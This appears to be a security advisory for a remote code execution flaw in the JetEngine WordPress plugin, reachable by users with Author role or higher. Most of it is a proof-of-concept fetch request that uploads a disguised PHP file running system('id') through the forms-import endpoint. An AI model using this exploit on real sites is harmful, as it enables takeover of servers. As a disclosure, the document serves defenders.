The plugin includes uploaded files without adequately ensuring that they are not executable, leading to a remote code execution vulnerability.
Proof of Concept - JetEngine Author+ Include() RCE
1
2
3
4
5
6
7
8
9
fetch("/wp-admin/admin.php?action=jet_engine_forms_import", {
"headers": {
"accept": "text/html",
"content-type": "multipart/form-data; boundary=----WebKitFormBoundary5hcKRhxO2OVXJm3s"
},
"body": "------WebKitFormBoundary5hcKRhxO2OVXJm3s\r\nContent-Disposition: form-data; name=\"form_file\"; filename=\"poc.php\"\r\nContent-Type: application/json\r\n\r\n<?php die(system('id'));\r\n------WebKitFormBoundary5hcKRhxO2OVXJm3s--\r\n",
"method": "POST",
"credentials": "include"
}).then(response => response.text()).then((data) => console.log(data));